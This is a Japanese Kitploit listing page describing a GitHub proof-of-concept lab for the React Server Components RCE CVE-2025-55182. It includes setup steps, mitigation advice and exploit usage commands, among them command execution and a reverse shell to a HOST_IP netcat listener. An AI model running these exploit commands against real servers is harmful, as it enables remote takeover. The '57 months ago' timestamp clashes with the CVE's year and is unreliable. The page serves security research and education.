Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-55182-poc — Lab environment and PoC exploit for CVE-2025-55182 (React2Shell), a critical RCE vulnerability in React Server Components. Includes vulnerable app, exploit scripts, and scanner for security research and education. CVE-2025-55182 (React2Shell) の実験環境と概念実証エクスプロイト。React Server Components における深刻なRCE脆弱性です。脆弱なアプリ、エクスプロイトスクリプト、スキャナを含み、セキュリティ研究と教育向けです。 | Kitploit
ツール/GitHubGitHub/mooowu/cve-2025-55182-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育リモートアクセスツールペイロード開発ラボと実践
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

リポジトリを見る
57ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →

概要

Lab environment and PoC exploit for CVE-2025-55182 (React2Shell), a critical RCE vulnerability in React Server Components. Includes vulnerable app, exploit scripts, and scanner for security research and education. CVE-2025-55182 (React2Shell) の実験環境と概念実証エクスプロイト。React Server Components における深刻なRCE脆弱性です。脆弱なアプリ、エクスプロイトスクリプト、スキャナを含み、セキュリティ研究と教育向けです。

共有

CVE-2025-55182 (React2Shell) 脆弱性解析ラボ

このリポジトリは、React 19.x および Next.js 15.x に影響を与える React Server Components (RSC) の重大なリモートコード実行 (RCE) 脆弱性 CVE-2025-55182 を解析および再現するための完全な環境を提供します。

⚠️ 警告: このプロジェクトは意図的に脆弱なコードを含んでいます。公開サーバーや本番環境にデプロイしないでください。

🔍 脆弱性概要

  • CVE ID: CVE-2025-55182
  • Alias: React2Shell
  • CVSS Score: 10.0 (クリティカル)
  • Vulnerability Type: CWE-502 (信頼できないデータのデシリアライゼーション)
  • Affected Components:
    • React Server Components (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

仕組み

脆弱性は、React Server Components ランタイムが HTTP リクエスト(サーバーアクション)からのシリアライズデータを処理する方法に存在します。攻撃者は悪意のある「Flight」プロトコルペイロードを細工し、サーバーによってデシリアライズされると、認証チェックが行われる前に任意のコードが実行されます。

📂 プロジェクト構造

root@kitploit:~
react2shell/
├── vulnerable-app/       # Vulnerable Next.js 15 application
│   ├── app/
│   │   ├── actions.ts    # Vulnerable Server Actions
│   │   └── page.tsx      # UI for testing vulnerability
│   ├── Dockerfile        # Container definition
│   └── package.json
├── exploit/              # Exploit tools
│   ├── exploit.py        # Python PoC exploit
│   ├── scanner.py        # Vulnerability scanner
│   └── quick_exploit.sh  # Simple bash exploit
├── docs/                 # Analysis documentation
└── docker-compose.yml    # Isolated lab environment

🚀 はじめに

前提条件

  • Docker & Docker Compose
  • Python 3.x(ローカルでエクスプロイトを実行するため)

1. ラボ環境を起動する

隔離されたコンテナ内で脆弱なアプリケーションを実行します:

root@kitploit:~
docker-compose up -d --build

アプリケーションは http://localhost:3000 で利用可能になります。

2. アプリケーションを確認する

ブラウザで http://localhost:3000 にアクセスしてください。「React2Shell Lab」インターフェースと以下のテストパネルが表示されます:

  • コマンド実行: 直接コマンドインジェクションをテスト
  • 安全でないデシリアライゼーション: JSONベースのデシリアライゼーションエクスプロイトをテスト
  • 任意ファイル読み取り: パストラバーサルをテスト
  • システム情報: システムの詳細を表示(RCEの影響を確認するため)

⚔️ エクスプロイト

脆弱性をテストするためのいくつかのツールを提供します。

Pythonエクスプロイトを使用する

  1. 要件をインストール:

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. 脆弱性があるか確認:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. コマンドを実行:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. リバースシェル(リスナーが必要。例: nc -lvnp 4444):

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

スキャナーを使用する

脆弱なReact/Next.jsインスタンスをスキャン:

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ 緩和策

自身のアプリケーションでこの脆弱性を修正するには:

  1. 依存関係のアップグレード:

    • React をバージョン 19.3.0 以降にアップグレードしてください。
    • Next.js を、使用しているブランチに応じてバージョン 15.0.5、15.1.9、または 16.0.8 にアップグレードしてください。
  2. パッチの確認: package.json を確認して、react-server-dom-* パッケージが更新されていることを確認してください。

📝 免責事項

このプロジェクトは教育目的およびセキュリティ研究のみを目的としています。著者は、本資料の誤用について一切の責任を負いません。

ツールをダウンロード